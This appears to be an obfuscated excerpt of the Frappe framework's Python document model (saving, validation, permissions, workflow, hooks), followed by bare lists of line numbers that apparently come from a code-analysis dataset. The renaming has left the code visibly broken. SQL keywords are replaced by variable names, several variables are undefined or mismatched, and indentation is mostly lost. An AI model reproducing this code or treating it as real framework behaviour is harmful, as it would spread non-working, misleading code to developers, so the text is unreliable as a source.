if VAR_19.options in (self.flags.ignore_children_type or []):
return
if VAR_50:
VAR_84 = frappe.db.sql("""select VAR_3 from `tab{0}` where parent=%s
and VAR_24=%s and VAR_36=%s
and VAR_3 not in ({1})""".format(VAR_19.options, ','.join(['%s'] * len(VAR_50))),
[self.name, self.doctype, VAR_18] + VAR_50)
if len(VAR_84) > 0:
frappe.db.sql("""delete from `tab{0}` where VAR_3 in ({1})""".format(VAR_19.options,
','.join(['%s'] * len(VAR_84))), tuple(row[0] for row in VAR_84))
else:
frappe.db.sql("""delete from `tab{0}` where parent=%s
and VAR_24=%s and VAR_36=%s""".format(VAR_19.options),
(self.name, self.doctype, VAR_18))
def FUNC_15(self):
return getattr(self, '_doc_before_save', None)
def FUNC_16(self, VAR_18):
VAR_51 = self.get_doc_before_save()
return VAR_51.get(VAR_18)!=self.get(VAR_18) if VAR_51 else True
	def FUNC_17(self, VAR_20=False, VAR_15=None, VAR_16=True):
		"""Assign a name to this document (and optionally its children).

		Does nothing when a name was already set, unless VAR_20 (force) is
		truthy. An explicit "__newname" value or the VAR_15 argument takes
		precedence; otherwise naming is delegated to a module-level helper.

		NOTE(review): the bare calls ``FUNC_17(self)`` / ``FUNC_17(VAR_21)``
		below resolve to a module-level name of the same identifier
		(presumably a naming helper imported at file top), not to this
		method — confirm against the file's imports.
		"""
		if self.flags.name_set and not VAR_20:
			return
		if self.get("__newname"):
			self.name = self.get("__newname")
			self.flags.name_set = True
			return
		if VAR_15:
			self.name = VAR_15
		else:
			FUNC_17(self)
		if VAR_16:
			for VAR_21 in self.get_all_children():
				FUNC_17(VAR_21)
		self.flags.name_set = True
def FUNC_18(self):
return self.get(self.meta.get_title_field())
def FUNC_19(self):
def FUNC_80():
VAR_85 = self.as_dict()
for VAR_45, VAR_26 in iteritems(VAR_85):
if VAR_26==None:
VAR_85[VAR_45] = ""
return VAR_85
if self.meta.get("title_field")=="title":
VAR_19 = self.meta.get_field(self.meta.title_field)
if VAR_19.options:
self.set(VAR_19.fieldname, VAR_19.options.format(**FUNC_80()))
elif self.is_new() and not self.get(VAR_19.fieldname) and VAR_19.default:
self.set(VAR_19.fieldname, VAR_19.default.format(**FUNC_80()))
def FUNC_20(self, VAR_21):
frappe.db.sql("""delete from `tabSingles` where VAR_2=%s""", self.doctype)
for field, VAR_26 in iteritems(VAR_21):
if field != "doctype":
frappe.db.sql("""insert into `tabSingles` (VAR_2, field, VAR_26)
VAR_85 (%s, %s, %s)""", (self.doctype, field, VAR_26))
if self.doctype in frappe.db.value_cache:
del frappe.db.value_cache[self.doctype]
def FUNC_21(self):
self._original_modified = self.modified
self.modified = now()
self.modified_by = frappe.session.user
if not self.creation:
self.creation = self.modified
if not self.owner:
self.owner = self.modified_by
for VAR_21 in self.get_all_children():
VAR_21.modified = self.modified
VAR_21.modified_by = self.modified_by
if not VAR_21.owner:
VAR_21.owner = self.owner
if not VAR_21.creation:
VAR_21.creation = self.creation
frappe.flags.currently_saving.append((self.doctype, self.name))
def FUNC_22(self):
if self.docstatus==None:
self.docstatus=0
for VAR_21 in self.get_all_children():
VAR_21.docstatus = self.docstatus
def FUNC_23(self):
self._validate_mandatory()
self._validate_data_fields()
self._validate_selects()
self._validate_non_negative()
self._validate_length()
self._extract_images_from_text_editor()
self._sanitize_content()
self._save_passwords()
self.validate_workflow()
VAR_52 = self.get_all_children()
for VAR_21 in VAR_52:
VAR_21._validate_data_fields()
VAR_21._validate_selects()
VAR_21._validate_non_negative()
VAR_21._validate_length()
VAR_21._extract_images_from_text_editor()
VAR_21._sanitize_content()
VAR_21._save_passwords()
if self.is_new():
for VAR_18 in optional_fields:
self.set(VAR_18, None)
else:
self.validate_set_only_once()
def FUNC_24(self):
def FUNC_81(VAR_19):
if self.parentfield:
return "{} {} #{}: {} {}".format(frappe.bold(_(self.doctype)),
_("Row"), self.idx, _("Value cannot be negative for"), frappe.bold(_(VAR_19.label)))
else:
return _("Value cannot be negative for {0}: {1}").format(_(VAR_19.parent), frappe.bold(_(VAR_19.label)))
for VAR_19 in self.meta.get('fields', {'non_negative': ('=', 1),
'fieldtype': ('in', ['Int', 'Float', 'Currency'])}):
if flt(self.get(VAR_19.fieldname)) < 0:
VAR_88 = FUNC_81(VAR_19)
frappe.throw(VAR_88, frappe.NonNegativeError, title=_("Negative Value"))
	def FUNC_25(self):
		"""Validate and apply workflow state for the current action.

		Skipped entirely while the 'frappe' app is being installed.

		NOTE(review): the bare call ``FUNC_25(self)`` resolves to a
		module-level name of the same identifier (a workflow validator),
		not to this method — confirm against the file's imports.
		"""
		if frappe.flags.in_install == 'frappe': return
		VAR_53 = self.meta.get_workflow()
		if VAR_53:
			FUNC_25(self)
			# State transitions are applied for every action except a plain save.
			if not self._action == 'save':
				set_workflow_state_on_action(self, VAR_53, self._action)
def FUNC_26(self):
VAR_54 = self.meta.get_set_only_once_fields()
if VAR_54 and self._doc_before_save:
for field in VAR_54:
VAR_98 = False
VAR_26 = self.get(field.fieldname)
VAR_55 = self._doc_before_save.get(field.fieldname)
if field.fieldtype in VAR_82:
VAR_98 = not self.is_child_table_same(field.fieldname)
elif field.fieldtype in ('Date', 'Datetime', 'Time'):
VAR_98 = str(VAR_26) != str(VAR_55)
else:
VAR_98 = VAR_26 != VAR_55
if VAR_98:
frappe.throw(_("Value cannot be changed for {0}").format(self.meta.get_label(field.fieldname)),
frappe.CannotChangeConstantError)
return False
def FUNC_27(self, VAR_18):
VAR_26 = self.get(VAR_18)
VAR_55 = self._doc_before_save.get(VAR_18)
VAR_56 = True
if len(VAR_55) != len(VAR_26):
VAR_56 = False
else:
for i, VAR_21 in enumerate(VAR_55):
VAR_99 = VAR_26[i].as_dict(convert_dates_to_str = True)
VAR_100 = VAR_21.as_dict(convert_dates_to_str = True)
for VAR_45 in ('modified', 'modified_by', 'creation'):
del VAR_99[VAR_45]
del VAR_100[VAR_45]
if VAR_100 != VAR_99:
VAR_56 = False
break
return VAR_56
def FUNC_28(self):
if frappe.session.user == "Administrator":
return
VAR_57 = False
VAR_58 = self.meta.fields.copy()
for table_field in self.meta.get_table_fields():
VAR_58 += frappe.get_meta(table_field.options).fields or []
for VAR_19 in VAR_58:
if VAR_19.permlevel > 0:
VAR_57 = True
break
if not VAR_57:
return
VAR_59 = self.get_permlevel_access('read')
for VAR_19 in self.meta.fields:
if VAR_19.permlevel and not VAR_19.permlevel in VAR_59:
self.set(VAR_19.fieldname, None)
for table_field in self.meta.get_table_fields():
for VAR_19 in frappe.get_meta(table_field.options).fields or []:
if VAR_19.permlevel and not VAR_19.permlevel in VAR_59:
for child in self.get(table_field.fieldname) or []:
child.set(VAR_19.fieldname, None)
def FUNC_29(self):
if self.flags.ignore_permissions or frappe.flags.in_install:
return
if frappe.session.user == "Administrator":
return
VAR_59 = self.get_permlevel_access()
VAR_60 = self.meta.get_high_permlevel_fields()
if VAR_60:
self.reset_values_if_no_permlevel_access(VAR_59, VAR_60)
if self.is_new(): return
for VAR_19 in self.meta.get_table_fields():
VAR_60 = frappe.get_meta(VAR_19.options).get_high_permlevel_fields()
if VAR_60:
for VAR_21 in self.get(VAR_19.fieldname):
VAR_21.reset_values_if_no_permlevel_access(VAR_59, VAR_60)
def FUNC_30(self, VAR_22='write'):
if not hasattr(self, "_has_access_to"):
self._has_access_to = {}
self._has_access_to[VAR_22] = []
VAR_61 = frappe.get_roles()
for perm in self.get_permissions():
if perm.role in VAR_61 and perm.get(VAR_22):
if perm.permlevel not in self._has_access_to[VAR_22]:
self._has_access_to[VAR_22].append(perm.permlevel)
return self._has_access_to[VAR_22]
def FUNC_31(self, VAR_18, VAR_19=None, VAR_22='read'):
if not VAR_19:
VAR_19 = self.meta.get_field(VAR_18)
return VAR_19.permlevel in self.get_permlevel_access(VAR_22)
def FUNC_32(self):
if self.meta.istable:
permissions = frappe.get_meta(self.parenttype).permissions
else:
VAR_86 = self.meta.permissions
return VAR_86
def FUNC_33(self):
if frappe.flags.in_import:
return
VAR_62 = frappe.new_doc(self.doctype, as_dict=True)
self.update_if_missing(VAR_62)
for VAR_19 in self.meta.get_table_fields():
VAR_62 = frappe.new_doc(VAR_19.options, as_dict=True)
VAR_26 = self.get(VAR_19.fieldname)
if isinstance(VAR_26, list):
for VAR_21 in VAR_26:
VAR_21.update_if_missing(VAR_62)
def FUNC_34(self):
VAR_63 = False
self._action = "save"
if not self.get('__islocal'):
if self.meta.issingle:
VAR_101 = frappe.db.sql("""select VAR_26 from tabSingles
where VAR_2=%s and field='modified' for update""", self.doctype)
VAR_101 = VAR_101 and VAR_101[0][0]
if VAR_101 and VAR_101 != cstr(self._original_modified):
VAR_63 = True
else:
VAR_102 = frappe.db.sql("""select VAR_101, VAR_23 from `tab{0}`
where VAR_3 = %s for update""".format(self.doctype), self.name, as_dict=True)
if not VAR_102:
frappe.throw(_("Record does not exist"))
else:
VAR_102 = tmp[0]
VAR_101 = cstr(VAR_102.modified)
if VAR_101 and VAR_101 != cstr(self._original_modified):
VAR_63 = True
self.check_docstatus_transition(VAR_102.docstatus)
if VAR_63:
frappe.msgprint(_("Error: CLASS_0 has been VAR_101 after you have opened it") \
+ (" (%s, %s). " % (VAR_101, self.modified)) \
+ _("Please refresh to get the latest document."),
VAR_35=frappe.TimestampMismatchError)
else:
self.check_docstatus_transition(0)
	def FUNC_35(self, VAR_23):
		"""Set ``self._action`` based on the stored docstatus VAR_23 and the
		docstatus on this instance, enforcing legal transitions and the
		matching submit/cancel permissions.

		Raises ``frappe.DocstatusTransitionError`` for illegal transitions
		and ``frappe.ValidationError`` when editing a cancelled document.
		"""
		if not self.docstatus:
			self.docstatus = 0
		if VAR_23==0:
			# Stored document is a draft.
			if self.docstatus==0:
				self._action = "save"
			elif self.docstatus==1:
				self._action = "submit"
				self.check_permission("submit")
			else:
				raise frappe.DocstatusTransitionError(_("Cannot change VAR_23 from 0 to 2"))
		elif VAR_23==1:
			# Stored document is submitted.
			if self.docstatus==1:
				self._action = "update_after_submit"
				self.check_permission("submit")
			elif self.docstatus==2:
				self._action = "cancel"
				self.check_permission("cancel")
			else:
				raise frappe.DocstatusTransitionError(_("Cannot change VAR_23 from 1 to 0"))
		elif VAR_23==2:
			raise frappe.ValidationError(_("Cannot edit cancelled document"))
def FUNC_36(self):
for VAR_21 in self.get_all_children():
VAR_21.parent = self.name
VAR_21.parenttype = self.doctype
def FUNC_37(self):
for VAR_21 in self.get_all_children():
if not VAR_21.name:
FUNC_17(VAR_21)
def FUNC_38(self):
if self.flags.ignore_validate_update_after_submit:
return
self._validate_update_after_submit()
for VAR_21 in self.get_all_children():
if VAR_21.is_new() and self.meta.get_field(VAR_21.parentfield).allow_on_submit:
continue
VAR_21._validate_update_after_submit()
def FUNC_39(self):
if self.flags.ignore_mandatory:
return
VAR_64 = self._get_missing_mandatory_fields()
for VAR_21 in self.get_all_children():
VAR_64.extend(VAR_21._get_missing_mandatory_fields())
if not VAR_64:
return
for VAR_18, VAR_88 in VAR_64:
msgprint(VAR_88)
if frappe.flags.print_messages:
print(self.as_json().encode("utf-8"))
raise frappe.MandatoryError('[{VAR_2}, {VAR_3}]: {fields}'.format(
fields=", ".join((each[0] for each in VAR_64)),
VAR_2=self.doctype,
VAR_3=self.name))
def FUNC_40(self):
if self.flags.ignore_links or self._action == "cancel":
return
VAR_65, VAR_66 = self.get_invalid_links()
for VAR_21 in self.get_all_children():
VAR_87 = VAR_21.get_invalid_links(is_submittable=self.meta.is_submittable)
VAR_65.extend(VAR_87[0])
VAR_66.extend(VAR_87[1])
if VAR_65:
VAR_88 = ", ".join((each[2] for each in VAR_65))
frappe.throw(_("Could not find {0}").format(VAR_88),
frappe.LinkValidationError)
if VAR_66:
VAR_88 = ", ".join((each[2] for each in VAR_66))
frappe.throw(_("Cannot link cancelled document: {0}").format(VAR_88),
frappe.CancelledLinkError)
def FUNC_41(self, VAR_24=None):
VAR_67 = []
for VAR_19 in self.meta.get("fields", {"fieldtype": ['in', VAR_82]}):
if VAR_24:
if VAR_19.options==VAR_24:
return self.get(VAR_19.fieldname)
VAR_26 = self.get(VAR_19.fieldname)
if isinstance(VAR_26, list):
VAR_67.extend(VAR_26)
return VAR_67
	def FUNC_42(self, VAR_25, *VAR_0, **VAR_1):
		"""Run the controller method named VAR_25 (when defined) composed
		with all registered doc-event hooks, then fire notifications,
		webhooks and server scripts for the event. Returns the hooked
		result."""
		if "flags" in VAR_1:
			del VAR_1["flags"]
		if hasattr(self, VAR_25) and hasattr(getattr(self, VAR_25), "__call__"):
			# The controller defines the method: wrap the bound attribute.
			VAR_6 = lambda self, *VAR_0, **VAR_1: getattr(self, VAR_25)(*VAR_0, **VAR_1)
		else:
			# No such method: use a no-op so registered hooks still run.
			VAR_6 = lambda self, *VAR_0, **VAR_1: None
		VAR_6.__name__ = str(VAR_25)
		VAR_68 = CLASS_0.hook(VAR_6)(self, *VAR_0, **VAR_1)
		self.run_notifications(VAR_25)
		run_webhooks(self, VAR_25)
		run_server_script_for_doc_event(self, VAR_25)
		return VAR_68
def FUNC_43(self, VAR_25, *VAR_0, **VAR_1):
return self.run_method(VAR_25, *VAR_0, **VAR_1)
def FUNC_44(self, VAR_25):
if (frappe.flags.in_import and frappe.flags.mute_emails) or frappe.flags.in_patch or frappe.flags.in_install:
return
if self.flags.notifications_executed==None:
self.flags.notifications_executed = []
from frappe.email.doctype.notification.notification import evaluate_alert
if self.flags.notifications == None:
VAR_89 = frappe.cache().hget('notifications', self.doctype)
if VAR_89==None:
VAR_89 = frappe.get_all('Notification', fields=['name', 'event', 'method'],
filters={'enabled': 1, 'document_type': self.doctype})
frappe.cache().hset('notifications', self.doctype, VAR_89)
self.flags.notifications = VAR_89
if not self.flags.notifications:
return
def FUNC_82(VAR_69):
if not VAR_69.name in self.flags.notifications_executed:
evaluate_alert(self, VAR_69.name, VAR_69.event)
self.flags.notifications_executed.append(VAR_69.name)
VAR_70 = {
"on_update": "Save",
"after_insert": "New",
"on_submit": "Submit",
"on_cancel": "Cancel"
}
if not self.flags.in_insert:
VAR_70['on_change'] = 'Value Change'
for VAR_69 in self.flags.notifications:
VAR_90 = VAR_70.get(VAR_25, None)
if VAR_90 and VAR_69.event == VAR_90:
FUNC_82(VAR_69)
elif VAR_69.event=='Method' and VAR_25 == VAR_69.method:
FUNC_82(VAR_69)
@FUNC_2.__func__
def FUNC_45(self):
self.docstatus = 1
self.save()
@FUNC_2.__func__
def FUNC_46(self):
self.docstatus = 2
self.save()
@FUNC_2.__func__
def FUNC_47(self):
self._submit()
@FUNC_2.__func__
def FUNC_48(self):
self._cancel()
def FUNC_49(self, VAR_11=False):
frappe.delete_doc(self.doctype, self.name, VAR_11 = ignore_permissions, flags=self.flags)
	def FUNC_50(self):
		"""Run the controller events that precede a save: load the pre-save
		snapshot, reset the "seen" list, then fire the validate/before_*
		methods matching the current ``self._action``."""
		self.load_doc_before_save()
		self.reset_seen()
		if self._action in ("save", "submit"):
			self.run_method("before_validate")
		if self.flags.ignore_validate:
			return
		if self._action=="save":
			self.run_method("validate")
			self.run_method("before_save")
		elif self._action=="submit":
			self.run_method("validate")
			self.run_method("before_submit")
		elif self._action=="cancel":
			self.run_method("before_cancel")
		elif self._action=="update_after_submit":
			self.run_method("before_update_after_submit")
		self.set_title_field()
def FUNC_51(self):
self._doc_before_save = None
if not self.is_new():
try:
self._doc_before_save = frappe.get_doc(self.doctype, self.name)
except frappe.DoesNotExistError:
self._doc_before_save = None
frappe.clear_last_message()
	def FUNC_52(self):
		"""Run the controller events that follow a database write
		(on_update / on_submit / on_cancel / on_update_after_submit), then
		clear caches, publish realtime updates, refresh global search and
		save a version record."""
		# NOTE(review): VAR_71 is fetched but unused in this body — presumably
		# kept so hooks can observe the pre-save snapshot; confirm.
		VAR_71 = self.get_doc_before_save()
		if self._action=="save":
			self.run_method("on_update")
		elif self._action=="submit":
			self.run_method("on_update")
			self.run_method("on_submit")
		elif self._action=="cancel":
			self.run_method("on_cancel")
			self.check_no_back_links_exist()
		elif self._action=="update_after_submit":
			self.run_method("on_update_after_submit")
		self.clear_cache()
		self.notify_update()
		update_global_search(self)
		self.save_version()
		self.run_method('on_change')
		# This (doctype, name) pair is no longer "currently saving".
		if (self.doctype, self.name) in frappe.flags.currently_saving:
			frappe.flags.currently_saving.remove((self.doctype, self.name))
		self.latest = None
def FUNC_53(self):
frappe.clear_document_cache(self.doctype, self.name)
def FUNC_54(self):
if getattr(self.meta, 'track_seen', False):
frappe.db.set_value(self.doctype, self.name, "_seen", json.dumps([frappe.session.user]), VAR_27=False)
def FUNC_55(self):
if frappe.flags.in_patch: return
frappe.publish_realtime("doc_update", {"modified": self.modified, "doctype": self.doctype, "name": self.name},
VAR_2=self.doctype, docname=self.name, after_commit=True)
if not self.meta.get("read_only") and not self.meta.get("issingle") and \
not self.meta.get("istable"):
VAR_91 = {
"doctype": self.doctype,
"name": self.name,
"user": frappe.session.user
}
frappe.publish_realtime("list_update", VAR_91, after_commit=True)
def FUNC_56(self, VAR_18, VAR_26=None, VAR_27=True, VAR_28=False, VAR_29=False):
if isinstance(VAR_18, dict):
self.update(VAR_18)
else:
self.set(VAR_18, VAR_26)
if VAR_27 and (self.doctype, self.name) not in frappe.flags.currently_saving:
self.set("modified", now())
self.set("modified_by", frappe.session.user)
self.load_doc_before_save()
self.run_method('before_change')
frappe.db.set_value(self.doctype, self.name, VAR_18, VAR_26,
self.modified, self.modified_by, VAR_27=update_modified)
self.run_method('on_change')
if VAR_28:
self.notify_update()
self.clear_cache()
if VAR_29:
frappe.db.commit()
def FUNC_57(self, VAR_18):
return frappe.db.get_value(self.doctype, self.name, VAR_18)
def FUNC_58(self):
from frappe.model.delete_doc import check_if_doc_is_linked, check_if_doc_is_dynamically_linked
if not self.flags.ignore_links:
check_if_doc_is_linked(self, VAR_25="Cancel")
check_if_doc_is_dynamically_linked(self, VAR_25="Cancel")
def FUNC_59(self):
if (not getattr(self.meta, 'track_changes', False)
or self.doctype == 'Version'
or self.flags.ignore_version
or frappe.flags.in_install
or (not self._doc_before_save and frappe.flags.in_patch)):
return
VAR_72 = frappe.new_doc('Version')
if not self._doc_before_save:
VAR_72.for_insert(self)
VAR_72.insert(VAR_11=True)
elif VAR_72.set_diff(self._doc_before_save, self):
VAR_72.insert(VAR_11=True)
if not frappe.flags.in_migrate:
follow_document(self.doctype, self.name, frappe.session.user)
	@staticmethod
	def FUNC_60(VAR_30):
		"""Decorator that composes a controller method with all doc-event
		handlers registered via ``frappe.get_doc_hooks()`` for this doctype
		(and for "*"), accumulating return values in ``self._return_value``."""
		def FUNC_83(self, VAR_73):
			# Fold one handler's return value into the accumulated result:
			# dicts are merged, other truthy values replace the accumulator.
			if isinstance(VAR_73, dict):
				if not self.get("_return_value"):
					self._return_value = {}
				self._return_value.update(VAR_73)
			else:
				self._return_value = VAR_73 or self.get("_return_value")
		def FUNC_84(VAR_6, *VAR_74):
			# Build a composite that runs the original method first, then
			# every registered hook, returning the accumulated value.
			def FUNC_86(self, VAR_25, *VAR_0, **VAR_1):
				FUNC_83(self, VAR_6(self, *VAR_0, **VAR_1))
				for VAR_30 in VAR_74:
					FUNC_83(self, VAR_30(self, VAR_25, *VAR_0, **VAR_1))
				return self._return_value
			return FUNC_86
		def FUNC_85(self, *VAR_0, **VAR_1):
			# Collect handlers registered for this doctype and for all ("*").
			VAR_74 = []
			VAR_25 = VAR_30.__name__
			VAR_92 = frappe.get_doc_hooks()
			for handler in VAR_92.get(self.doctype, {}).get(VAR_25, []) \
				+ VAR_92.get("*", {}).get(VAR_25, []):
				VAR_74.append(frappe.get_attr(handler))
			VAR_93 = FUNC_84(VAR_30, *VAR_74)
			return VAR_93(self, VAR_25, *VAR_0, **VAR_1)
		return FUNC_85
def FUNC_61(self, VAR_31):
VAR_25 = getattr(self, VAR_31, None)
if not VAR_6:
raise NotFound("Method {0} not found".format(VAR_31))
FUNC_61(getattr(VAR_25, '__func__', VAR_25))
def FUNC_62(self, VAR_18, VAR_32, VAR_33, VAR_34=None, VAR_35=None):
VAR_75 = {
"in": _("one of"),
"not in": _("none of"),
"^": _("beginning with"),
}
if not VAR_34:
doc = self
VAR_76 = VAR_34.get_value(VAR_18)
VAR_19 = VAR_34.meta.get_field(VAR_18)
VAR_33 = VAR_34.cast(VAR_33, VAR_19)
if not frappe.compare(VAR_76, VAR_32, VAR_33):
VAR_94 = VAR_34.meta.get_label(VAR_18)
VAR_95 = VAR_75.get(VAR_32, condition)
if VAR_34.parentfield:
VAR_88 = _("Incorrect VAR_26 in row {0}: {1} must be {2} {3}").format(VAR_34.idx, VAR_94, VAR_95, VAR_33)
else:
VAR_88 = _("Incorrect VAR_26: {0} must be {1} {2}").format(VAR_94, VAR_95, VAR_33)
msgprint(VAR_88, VAR_35=raise_exception or True)
def FUNC_63(self, VAR_36, VAR_35=None):
if not (isinstance(self.get(VAR_36), list) and len(self.get(VAR_36)) > 0):
VAR_94 = self.meta.get_label(VAR_36)
frappe.throw(_("Table {0} cannot be empty").format(VAR_94), VAR_35 or frappe.EmptyTableError)
def FUNC_64(self, VAR_34, VAR_37=None):
if not VAR_37:
fieldnames = (VAR_19.fieldname for VAR_19 in
VAR_34.meta.get("fields", {"fieldtype": ["in", ["Currency", "Float", "Percent"]]}))
for VAR_18 in VAR_37:
VAR_34.set(VAR_18, flt(VAR_34.get(VAR_18), self.precision(VAR_18, VAR_34.parentfield)))
def FUNC_65(self):
return "/app/Form/{VAR_2}/{VAR_3}".format(VAR_2=self.doctype, VAR_3=self.name)
def FUNC_66(self, VAR_38='Comment', VAR_39=None, VAR_40=None, VAR_41=None, VAR_42=None, VAR_43=None):
VAR_68 = frappe.get_doc({
"doctype":"Comment",
'comment_type': VAR_38,
"comment_email": VAR_40 or frappe.session.user,
"comment_by": VAR_43,
"reference_doctype": self.doctype,
"reference_name": self.name,
"content": VAR_39 or VAR_38,
"link_doctype": VAR_41,
"link_name": VAR_42
}).insert(VAR_11=True)
return VAR_68
def FUNC_67(self, VAR_44=None):
if not VAR_44:
user = frappe.session.user
if self.meta.track_seen:
VAR_96 = self.get('_seen') or []
VAR_96 = frappe.parse_json(VAR_96)
if VAR_44 not in VAR_96:
_seen.append(VAR_44)
frappe.db.set_value(self.doctype, self.name, '_seen', json.dumps(VAR_96), VAR_27=False)
frappe.local.flags.commit = True
def FUNC_68(self, VAR_44=None):
if not VAR_44:
user = frappe.session.user
if hasattr(self.meta, 'track_views') and self.meta.track_views:
frappe.get_doc({
"doctype": "View Log",
"viewed_by": frappe.session.user,
"reference_doctype": self.doctype,
"reference_name": self.name,
}).insert(VAR_11=True)
frappe.local.flags.commit = True
def FUNC_69(self):
return hashlib.sha224(get_datetime_str(self.creation).encode()).hexdigest()
def FUNC_70(self):
VAR_77 = getattr(self, "_liked_by", None)
if VAR_77:
return json.loads(VAR_77)
else:
return []
def FUNC_71(self, VAR_45, VAR_26):
if not self.get("__onload"):
self.set("__onload", frappe._dict())
self.get("__onload")[VAR_45] = VAR_26
def FUNC_72(self, VAR_45=None):
if not VAR_45:
return self.get("__onload", frappe._dict())
return self.get('__onload')[VAR_45]
def FUNC_73(self, VAR_4, **VAR_1):
from frappe.utils.background_jobs import enqueue
if hasattr(self, '_' + VAR_4):
action = '_' + VAR_4
if file_lock.lock_exists(self.get_signature()):
frappe.throw(_('This document is currently queued for execution. Please try again'),
title=_('Document Queued'))
self.lock()
enqueue('frappe.model.document.execute_action', VAR_2=self.doctype, VAR_3=self.name,
VAR_4=action, **VAR_1)
def FUNC_74(self, VAR_46=None):
VAR_78 = self.get_signature()
if file_lock.lock_exists(VAR_78):
VAR_97 = True
if VAR_46:
for i in range(VAR_46):
time.sleep(1)
if not file_lock.lock_exists(VAR_78):
VAR_97 = False
break
if VAR_97:
raise frappe.DocumentLockedError
file_lock.create_lock(VAR_78)
def FUNC_75(self):
file_lock.delete_lock(self.get_signature())
def FUNC_76(self, VAR_47, VAR_48):
if date_diff(self.get(VAR_48), self.get(VAR_47)) < 0:
frappe.throw(_('{0} must be after {1}').format(
frappe.bold(self.meta.get_label(VAR_48)),
frappe.bold(self.meta.get_label(VAR_47)),
), frappe.exceptions.InvalidDates)
def FUNC_77(self):
VAR_79 = frappe.get_all('ToDo',
fields=['owner'],
filters={
'reference_type': self.doctype,
'reference_name': self.name,
'status': ('!=', 'Cancelled'),
})
VAR_80 = set([assignment.owner for assignment in VAR_79])
return VAR_80
def FUNC_78(self, VAR_49):
from frappe.desk.doctype.tag.tag import DocTags
DocTags(self.doctype).add(self.name, VAR_49)
def FUNC_79(self):
from frappe.desk.doctype.tag.tag import DocTags
return DocTags(self.doctype).get_tags(self.name).split(",")[1:]
def FUNC_1(VAR_2, VAR_3, VAR_4, **VAR_1):
	"""Execute action VAR_4 on document (VAR_2, VAR_3) after releasing its
	lock; on failure roll back the transaction and attach the error message
	as a comment on the document."""
	VAR_34 = frappe.get_doc(VAR_2, VAR_3)
	VAR_34.unlock()
	try:
		getattr(VAR_34, VAR_4)(**VAR_1)
	except Exception:
		frappe.db.rollback()
		# Prefer the last user-facing message; fall back to the traceback.
		if frappe.local.message_log:
			VAR_88 = json.loads(frappe.local.message_log[-1]).get('message')
		else:
			VAR_88 = '<pre><code>' + frappe.get_traceback() + '</pre></code>'
		VAR_34.add_comment('Comment', _('Action Failed') + '<br><br>' + VAR_88)
	VAR_34.notify_update()
| [
1,
2,
3,
21,
22,
23,
24,
27,
31,
33,
34,
36,
37,
45,
46,
48,
49,
54,
58,
60,
62,
65,
71,
75,
77,
82,
85,
92,
94,
96,
101,
108,
111,
114,
116,
118,
120,
123,
125,
127,
133,
137,
147,
151,
156,
158,
164,
173,
174,
177,
182,
187,
191,
196,
201,
207,
211,
213,
216,
219,
222,
224,
235,
241,
242,
243,
244,
253,
254,
257,
260,
263,
264,
265,
269,
270,
273,
274,
277,
281,
285,
289,
292,
297,
299,
302,
304,
308,
310,
316,
320,
323,
326,
328,
329,
334,
337,
338,
341,
343,
347,
348,
350,
351,
360,
361,
366,
372,
376,
378,
379,
381,
383,
389,
392,
394,
398,
401,
406,
409,
412,
413,
418,
423,
425,
428,
430,
434,
439,
444,
447,
451,
453,
461,
464,
473,
481,
483,
487,
490,
501,
512,
517,
525,
528,
532,
541,
545,
547,
552,
559,
563,
565,
571,
575,
579,
580,
584,
588,
590,
593,
596,
598,
602,
607,
610,
612,
616,
622,
627,
630,
633,
636,
637,
639,
640,
646,
650,
657,
659,
663,
665,
668,
672,
674,
678,
681,
682,
689,
695,
710,
715,
717,
720,
722,
730,
734,
739,
751,
761,
764,
770,
772,
776,
780,
784,
786,
788,
789,
790,
794,
798,
801,
804,
807,
812,
816,
818,
823,
828,
833,
845,
850,
854,
856,
859,
863,
865,
868,
873,
876,
878,
886,
889,
894,
901,
903,
905,
912,
918,
924,
929,
934,
938,
941,
946,
948,
951,
952,
955,
958,
969,
971,
981,
984,
989,
991,
1002,
1003,
1006,
1008,
1010,
1012,
1015,
1017,
1020,
1025,
1029,
1032,
1041,
1044,
1047,
1058,
1060,
1061,
1064,
1066,
1068,
1071,
1073,
1076,
1080,
1084,
1091,
1094,
1095,
1102,
1110,
1112,
1116,
1127,
1133,
1135,
1137,
1145,
1148,
1150,
1157,
1166,
1169,
1171,
1174,
1182,
1183,
1185,
1191,
1194,
1200,
1203,
1207,
1210,
1212,
1225,
1230,
1234,
1239,
1244,
1253,
1257,
1264,
1269,
1273,
1275,
1279,
1280,
1281,
1283,
1286,
1290,
1294,
1298,
1312,
1316,
1317,
1327,
1336,
1339,
1344,
1349,
1358,
1359,
1364,
1367,
1368,
1369,
1370,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
79,
1351,
81,
82,
83,
84,
85,
86,
87,
88,
130,
135,
139,
140,
184,
189,
190,
191,
192,
198,
204,
205,
206,
207,
208,
283,
287,
288,
289,
290,
291,
292,
293,
294,
345,
363,
368,
403,
408,
432,
436,
455,
534,
543,
567,
592,
624,
691,
692,
693,
694,
695,
696,
697,
732,
733,
734,
735,
736,
737,
738,
739,
740,
766,
835,
847,
870,
915,
921,
927,
932,
936,
940,
941,
942,
943,
944,
945,
946,
947,
973,
983,
984,
985,
986,
987,
988,
1022,
1027,
1043,
1044,
1045,
1046,
1047,
1048,
1049,
1050,
1051,
1052,
1053,
1082,
1086,
1093,
1115,
1116,
1117,
1118,
1119,
1159,
1160,
1187,
1193,
1194,
1195,
1196,
1205,
1209,
1210,
1211,
1227,
1241,
1255,
1277,
1278,
1296,
1297,
1298,
1299,
1314,
1319,
1320,
1321,
1341,
1346
] | [
1,
2,
3,
21,
22,
23,
24,
27,
31,
33,
34,
36,
37,
45,
46,
48,
49,
54,
58,
60,
62,
65,
71,
75,
77,
82,
85,
92,
94,
96,
101,
108,
111,
114,
116,
118,
120,
123,
125,
127,
133,
137,
147,
151,
156,
158,
164,
173,
174,
177,
182,
187,
191,
196,
201,
207,
211,
213,
216,
219,
222,
224,
235,
241,
242,
243,
244,
253,
254,
257,
260,
263,
264,
265,
269,
270,
273,
274,
277,
281,
285,
289,
292,
297,
299,
302,
304,
308,
310,
316,
320,
323,
326,
328,
329,
334,
337,
338,
341,
343,
347,
348,
350,
351,
360,
361,
366,
372,
376,
378,
379,
381,
383,
389,
392,
394,
398,
401,
406,
409,
412,
413,
418,
423,
425,
428,
430,
434,
439,
444,
447,
451,
453,
461,
464,
473,
481,
483,
487,
490,
501,
512,
517,
525,
528,
532,
541,
545,
547,
552,
559,
563,
565,
571,
575,
579,
580,
584,
588,
590,
593,
596,
598,
602,
607,
610,
612,
616,
622,
627,
630,
633,
636,
637,
639,
640,
646,
650,
657,
